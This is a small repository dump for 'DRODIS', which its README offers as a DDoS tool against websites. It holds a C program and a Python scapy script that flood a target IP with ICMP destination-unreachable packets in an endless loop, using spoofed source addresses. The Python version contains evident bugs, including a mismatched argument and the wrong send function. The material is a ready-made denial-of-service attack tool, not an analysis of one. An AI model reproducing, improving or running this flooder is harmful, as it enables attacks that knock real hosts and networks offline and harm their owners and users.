├── README.md ├── exploit.c └── exploit.py /README.md: -------------------------------------------------------------------------------- 1 | # DRODIS 2 | A ddos tool for penetration of websites 3 | 4 | # installation 5 | ``` 6 | pip install scapy 7 | 8 | git clone https://github.com/TermuxHackz/DRODIS 9 | 10 | cd DRODIS 11 | 12 | chmod +x exploit.py 13 | 14 | python exploit.py or python2 exploit.py 15 | ``` 16 | # Contributors 17 | @AnonyminHack5 18 | @Sourabh Mishra 19 | 20 | Thank you 21 | -------------------------------------------------------------------------------- /exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define PAYLOAD_SIZE 512 10 | 11 | typedef unsigned char u8; 12 | typedef unsigned short int u16; 13 | 14 | unsigned short icmpChecksum(unsigned short *ptr, int nbytes){ 15 | register long sum; 16 | u_short oddbyte; 17 | register u_short answer; 18 | 19 | sum = 0; 20 | while (nbytes > 1) { 21 | sum += *ptr++; 22 | nbytes -= 2; 23 | } 24 | 25 | if (nbytes == 1) { 26 | oddbyte = 0; 27 | *((u_char *) & oddbyte) = *(u_char *) ptr; 28 | sum += oddbyte; 29 | } 30 | 31 | sum = (sum >> 16) + (sum & 0xffff); 32 | sum += (sum >> 16); 33 | answer = ~sum; 34 | 35 | return (answer); 36 | } 37 | 38 | int main(int argc, char **argv){ 39 | printf("[+] DRODIS exploit\n"); 40 | if (argc < 1){ 41 | printf("[-] Missing argument, target"); 42 | printf(" Usage: %s \n", argv[0]); 43 | return -1; 44 | } 45 | int currentCode, sent, sentSize; 46 | int option = 1; 47 | 48 | 49 | unsigned long source = rand(); 50 | 51 | unsigned long target = inet_addr(argv[1]); 52 | 53 | 54 | int sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW); 55 | 56 | if (sockfd < 0){ 57 | perror("[-] Can't create socket, are you root ?"); 58 | return -1; 59 | } 60 | 61 | if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (const char*)&option, sizeof (option)) == -1){ 62 | perror("[-] Can't set socketopts IP_HDRINCL (to set custom options on IPV4 layer)"); 63 | return -1; 64 | } 65 | 66 | if (setsockopt (sockfd, SOL_SOCKET, SO_BROADCAST, (const char*)&option, sizeof (option)) == -1){ 67 | perror("[-] Can't set socketopts for broadcast"); 68 | return -1; 69 | } 70 | 71 | 72 | int finalPacketSize = sizeof (struct iphdr) + sizeof (struct icmphdr) + PAYLOAD_SIZE; 73 | char *packet = (char *) malloc (finalPacketSize); 74 | 75 | if (!packet){ 76 | perror("[-] Cannot allocate memory, if you never got this error before, you are lucky !"); 77 | close(sockfd); 78 | return -1; 79 | } 80 | 81 | memset (packet, 0, finalPacketSize); 82 | 83 | 84 | struct iphdr *ip = (struct iphdr *) packet; 85 | struct icmphdr *icmp = (struct icmphdr *) (packet + sizeof (struct iphdr)); 86 | 87 | 88 | ip->version = 4; 89 | ip->ihl = 5; 90 | ip->tos = 0; 91 | ip->tot_len = htons (finalPacketSize); 92 | ip->id = rand(); 93 | ip->frag_off = 0; 94 | ip->ttl = 255; 95 | ip->protocol = IPPROTO_ICMP; 96 | ip->saddr = source; 97 | ip->daddr = target; 98 | 99 | 100 | icmp->type = ICMP_DEST_UNREACH; 101 | icmp->code = 0; 102 | icmp->un.echo.sequence = rand(); 103 | icmp->un.echo.id = rand(); 104 | 105 | 106 | icmp->checksum = 0; 107 | 108 | 109 | 110 | struct sockaddr_in sockAddress; 111 | sockAddress.sin_family = AF_INET; 112 | sockAddress.sin_addr.s_addr = target; 113 | memset(&sockAddress.sin_zero, 0, sizeof (sockAddress.sin_zero)); 114 | 115 | puts("[+] Sending packets\n"); 116 | 117 | 118 | while (1){ 119 | icmp->code = 3; 120 | memset(packet + sizeof(struct iphdr) + sizeof(struct icmphdr), rand() % 255, PAYLOAD_SIZE); 121 | 122 | icmp->checksum = 0; 123 | icmp->checksum = icmpChecksum((unsigned short *)icmp, sizeof(struct icmphdr) + PAYLOAD_SIZE); 124 | 125 | if ( (sentSize = sendto(sockfd, packet, finalPacketSize, 0, (struct sockaddr*) &sockAddress, sizeof (sockAddress))) < 1){ 126 | perror("[-] Packet send failed\n"); 127 | free(packet); 128 | close(sockfd); 129 | return -1; 130 | } 131 | printf("[+] Already sent %d packets\r", ++sent); 132 | fflush(stdout); 133 | } 134 | 135 | 136 | free(packet); 137 | close(sockfd); 138 | 139 | return 0; 140 | } 141 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | #Sourabh Mishra 2 | from scapy.all import * 3 | from time import sleep 4 | from os import geteuid 5 | from sys import argv, exit 6 | from argparse import ArgumentParser 7 | 8 | def exploit(source, target, iface="eth0"): 9 | """DRODIS ATTACK""" 10 | 11 | socket = conf.L2socket(iface=iface) 12 | packets=[] 13 | for i in xrange(1,100): 14 | packets.append(IP(dst=target,src=source)/ICMP(type=3,code=3)) 15 | 16 | while True: 17 | sendp(packets) 18 | 19 | if __name__ == "__main__": 20 | ap = ArgumentParser(description="DRODIS Packet Flooding Attack") 21 | ap.add_argument("-s", "--source", required=True, help="Spoofed source IP address") 22 | ap.add_argument("-t", "--target", required=True, help="Target's IP address") 23 | ap.add_argument("-i", "--interface", required=False, help="Network interface to use") 24 | args = vars(ap.parse_args()) 25 | 26 | if not geteuid() == 0: 27 | exit("[!] Nice to See You pal, hope we meet Again!") 28 | 29 | try: 30 | print("[*] Starting DRODIS attack") 31 | exploit(args["source"], args["target"], args["interface"], args["interval"]) 32 | except IOError: 33 | exit("[!] Error sending packets") 34 | except KeyboardInterrupt: 35 | print("\n[*] Stopping DRODIS attack") 36 | --------------------------------------------------------------------------------